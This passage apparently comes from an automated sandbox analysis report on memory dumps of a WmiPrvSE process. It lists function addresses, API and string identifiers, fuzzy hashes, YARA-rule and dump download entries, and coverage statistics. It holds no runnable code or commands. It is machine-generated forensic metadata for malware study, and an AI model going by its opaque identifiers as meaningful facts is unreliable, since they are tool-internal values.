                                                                • API String ID: 3242871069-816001796
                                                                • Opcode ID: 33a55b782cbe91239c1fe0eb5582a54f1a6f137d165d6d6436cc227b732483e2
                                                                • Instruction ID: 226ec044bed8f903715c8431d7be3fc9ff02ff224cf50aaccb222b56a2fc2439
                                                                • Opcode Fuzzy Hash: 33a55b782cbe91239c1fe0eb5582a54f1a6f137d165d6d6436cc227b732483e2
                                                                • Instruction Fuzzy Hash: 9E51923A311E628BDB64CF15D444BB977B2EB44B98F185235DB478BB88DB79C861C700
                                                                Function 000001F5A9688BA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2395640692-1018135373
                                                                • Opcode ID: 33a55b782cbe91239c1fe0eb5582a54f1a6f137d165d6d6436cc227b732483e2
                                                                • Instruction ID: 1639b0befb9804bb99019bf94244a111f0bf13750c96d234d363bcc9865863b7
                                                                • Opcode Fuzzy Hash: 33a55b782cbe91239c1fe0eb5582a54f1a6f137d165d6d6436cc227b732483e2
                                                                • Instruction Fuzzy Hash: B3519339311A228BDB54DB15E448BF83BB3EB54B98F18D2319B674B789DB79C861C700
                                                                Function 000001F5A9659DAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                • Opcode ID: e5aa027aec1ea5924f6576723edcddd7f9d70c87b2f908111e45284864cc0b5c
                                                                • Instruction ID: 1fe2ba14b73acbbdfa4eecd98191bb0e91889c52d84360132ecd9f0c33b73162
                                                                • Opcode Fuzzy Hash: e5aa027aec1ea5924f6576723edcddd7f9d70c87b2f908111e45284864cc0b5c
                                                                • Instruction Fuzzy Hash: BB51927A104FA286EB748F11D5443A877B2FB54B94FA8A235DB5A47BD5CB38C470C701
                                                                Function 000001F5A968A9AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                • Opcode ID: e5aa027aec1ea5924f6576723edcddd7f9d70c87b2f908111e45284864cc0b5c
                                                                • Instruction ID: 05c49a529c81f1f3fe2b6e551017c68b2742afb28d731e57db3ae55f554686ae
                                                                • Opcode Fuzzy Hash: e5aa027aec1ea5924f6576723edcddd7f9d70c87b2f908111e45284864cc0b5c
                                                                • Instruction Fuzzy Hash: 94518F3A100A9686EB748F1691443F87BB6EB54B94F14A326DF9A47B95CB38C4B1C700
                                                                Function 000001F5A968A5FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                • Opcode ID: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction ID: 91b64525fdaef6eea75889c457a94b22cffad6e49a2cf3fe2b3605fb899ad233
                                                                • Opcode Fuzzy Hash: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction Fuzzy Hash: 2961A276504BC581EB708F15E4407EABBB1FB95B88F049325EF9A03B99DB78C1A5CB00
                                                                Function 000001F5A968372C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                • String ID: pid_
                                                                • API String ID: 4193868204-4147670505
                                                                • Opcode ID: 4441f73b3b475cb3bf2f1679b6b73cf79ec1c36ceb4505a165b94f1f1b11f652
                                                                • Instruction ID: 2b1e4d4c1a2b3572a35af547d5d2e1870068e8d880560d6fceb3ed6748e9dce2
                                                                • Opcode Fuzzy Hash: 4441f73b3b475cb3bf2f1679b6b73cf79ec1c36ceb4505a165b94f1f1b11f652
                                                                • Instruction Fuzzy Hash: 43118179310F6391EB109B25E8547FA57B2FF44780F40A235AF5A83A98EF28C924C344
                                                                Function 000001F5A9691BF8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 2718003287-0
                                                                • Opcode ID: 5f916fa3fcf743e353e3c0a3456a01c31226e3ad66a2dbf4f7cb1688c1e5141a
                                                                • Instruction ID: 75c77cb2a3c747b3f1f8762207cf4a39d94ffe135c0745438c4dd9a9c51349cc
                                                                • Opcode Fuzzy Hash: 5f916fa3fcf743e353e3c0a3456a01c31226e3ad66a2dbf4f7cb1688c1e5141a
                                                                • Instruction Fuzzy Hash: 4ED1CF36714A9289E711CFB9D4803EC37B2FB547D8F149226DF5A9BB99DA34C526C300
                                                                Function 000001F5A9692520 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F5A969250B), ref: 000001F5A969263C
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F5A969250B), ref: 000001F5A96926C7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode
                                                                • String ID:
                                                                • API String ID: 953036326-0
                                                                • Opcode ID: 24b43c747a47c1539b5754b5e16eb6c2ca3b5d98313b940494bc4857311e40b3
                                                                • Instruction ID: b61fa151cd522ecd2a98b96efdb93a52986361e37beb46a721c01b168ba250e9
                                                                • Opcode Fuzzy Hash: 24b43c747a47c1539b5754b5e16eb6c2ca3b5d98313b940494bc4857311e40b3
                                                                • Instruction Fuzzy Hash: B191C37A610E6385FB609F6594403FD2BB6BB44B98F146229DF0B6FA95CB34C4A6C700
                                                                Function 000001F5A96824FC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 9f74b3962f733d39baaba749a95c371a470951bb715a297592e83bbb964cef3f
                                                                • Instruction ID: 474ba603c9e14996e09ac1b63b494d0edc9d1fef1f5955337ecdb04097a8ad0e
                                                                • Opcode Fuzzy Hash: 9f74b3962f733d39baaba749a95c371a470951bb715a297592e83bbb964cef3f
                                                                • Instruction Fuzzy Hash: AD71D33A200FA286E735DE2699503F96BB2FBA57C4F44A235DF4B43B89DA34C564C700
                                                                Function 000001F5A96827E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 714eff9087dd913c6a4ffa065c8bdde7316cfa1c1d020620face2bf4537217c7
                                                                • Instruction ID: 27680913411e95ba867be184a07b7c6b16591a3342df48f16a772b2749457b7e
                                                                • Opcode Fuzzy Hash: 714eff9087dd913c6a4ffa065c8bdde7316cfa1c1d020620face2bf4537217c7
                                                                • Instruction Fuzzy Hash: 5071A13A200FA355EB359A2698443FA6BB2FB997C4F41A236DF0A57B48DE35C525C700
                                                                Function 000001F5A96599FC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CallTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3163161869-2084237596
                                                                • Opcode ID: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction ID: 3fd9f24765773ae44656241303b610f1b5aaecb7dd94953a04899793e3ed93d1
                                                                • Opcode Fuzzy Hash: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction Fuzzy Hash: 2B619036504FD581EB609F25E4407EAB7B1FB95B98F446325EB9A07B95CB7CC1A0CB00
                                                                Function 000001F5A966254B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _log10_special
                                                                • String ID: NtDeviceIoControlFile
                                                                • API String ID: 3812965864-1552836012
                                                                • Opcode ID: 42a1b3425ae855bd3dcf8051a52efda2562a7f5b28bf36798d299c0f3618dee7
                                                                • Instruction ID: 2c4ac0c17d9237aad1137042fa54f73014f9a77b7aabc4f997907638dd425853
                                                                • Opcode Fuzzy Hash: 42a1b3425ae855bd3dcf8051a52efda2562a7f5b28bf36798d299c0f3618dee7
                                                                • Instruction Fuzzy Hash: D9614236929FEAC9D7579B359C612B557397F623C5F41A327EB0773A21DB1890234200
                                                                Function 000001F5A9692290 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: 39f3297ad757de2f44d07b29014c700c3c9e9a162aea80241aa030272b5c20f5
                                                                • Instruction ID: f48b7bae11bd5932e93d71026895adf66fe5ef610370a63245c11559ff2f44f1
                                                                • Opcode Fuzzy Hash: 39f3297ad757de2f44d07b29014c700c3c9e9a162aea80241aa030272b5c20f5
                                                                • Instruction Fuzzy Hash: 15419136214A5286DB209F25E4443FA77B2FB98794F815231EF4E8B798EB38C451C740
                                                                Function 000001F5A9689078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: 14621ee37c51e207233f822d95ea19160683cc8cf5c93e678e309839c92fc525
                                                                • Instruction ID: 0ced3d60b46999e9cb3970f0f47bdbbf12c4162bddfa00016b0e3a05aadbed12
                                                                • Opcode Fuzzy Hash: 14621ee37c51e207233f822d95ea19160683cc8cf5c93e678e309839c92fc525
                                                                • Instruction Fuzzy Hash: 8D112E36214F5582EB218B15F4402997BF5FB88B94F589324DB8E07B54DF3CC561CB00
                                                                Function 000001F5A9657842 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: __std_exception_copy
                                                                • String ID: `vector constructor iterator'$ctor closure'
                                                                • API String ID: 592178966-3792692944
                                                                • Opcode ID: 84cf900fcfb3d3a6fb1bf0d271bc9bb5e5e7286100d614fe8782b049529d09ed
                                                                • Instruction ID: a16e927c6577f40d821bbccec35d6bf36880777fcfd23b3f5c793d21a4fa2765
                                                                • Opcode Fuzzy Hash: 84cf900fcfb3d3a6fb1bf0d271bc9bb5e5e7286100d614fe8782b049529d09ed
                                                                • Instruction Fuzzy Hash: 88E04F65651B9590DF058F62E4512E833A59F59B54B48A2229B5D47311EB28D1F9C300
                                                                Function 000001F5A96578A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: __std_exception_copy
                                                                • String ID: ctor closure'$destructor iterator'
                                                                • API String ID: 592178966-595914035
                                                                • Opcode ID: bb5d781f8344c27ab00fab5f843211173fed2689d36f4f0c3b464b4cfa1e33da
                                                                • Instruction ID: a2e39bbb4be2b3f8b186ff1fc620984114812712079da9b0fe23c4a7bb25ded1
                                                                • Opcode Fuzzy Hash: bb5d781f8344c27ab00fab5f843211173fed2689d36f4f0c3b464b4cfa1e33da
                                                                • Instruction Fuzzy Hash: 2AE04665A11B9980DB068F61E4912E83366AB69B58B88A2228B5D4B311EB28D1E8C300
                                                                Function 000001F5A96579A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: std::bad_alloc::bad_alloc
                                                                • String ID: `scalar deleting destructor'$essorFeaturePresent
                                                                • API String ID: 1875163511-3386185940
                                                                • Opcode ID: abd9a1d832691902a70f18103a47b6c649109bffa18a88edc7b57f1d0681ce4f
                                                                • Instruction ID: f524460b39419ec2a234739556381339562bbb13eb7b0bb7cee649a1bfa63ae7
                                                                • Opcode Fuzzy Hash: abd9a1d832691902a70f18103a47b6c649109bffa18a88edc7b57f1d0681ce4f
                                                                • Instruction Fuzzy Hash: CAD05E36210ED695EF14EB04D8813E86331FB90308F906232D34E835B1DF38CA6AC340
                                                                Function 000001F5A9681D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID:
                                                                • API String ID: 756756679-0
                                                                • Opcode ID: 49e6f57c350109b6085f77543402dccdd1d3a28d0c40e0a7b35e606b00486c2c
                                                                • Instruction ID: e5c1b7d52507c9733da7ef1235c6f5fcbdedf8b2dc688684ba46b0efdeb3525a
                                                                • Opcode Fuzzy Hash: 49e6f57c350109b6085f77543402dccdd1d3a28d0c40e0a7b35e606b00486c2c
                                                                • Instruction Fuzzy Hash: E2116135611F9281EB04CF6AA4482AD67B2FB89FC4F599234DF4E57725DE38D4528340
                                                                Function 000001F5A9681264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction ID: 05c98d7c0f67fc2f547caf42a3f367d8b47950cef9a814c1e6ff8b1d9798c136
                                                                • Opcode Fuzzy Hash: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction Fuzzy Hash: 30E06D35601B1286EB048F66D80C3ADB7F2FF89F4AF04D124CA1A4B361DF7D84A98740
                                                                Function 000001F5A9681000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction ID: 71dc17eeb2123689a315321fbd814fe4ed161eedf74747c681af5b88c5f67e54
                                                                • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction Fuzzy Hash: EFE01275611A5287EB089F66D8083ADB7F2FF8CF5AF449134CA1A4B321DE3C84A9C710

                                                                Execution Graph

                                                                Execution Coverage:0.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:137
                                                                Total number of Limit Nodes:2
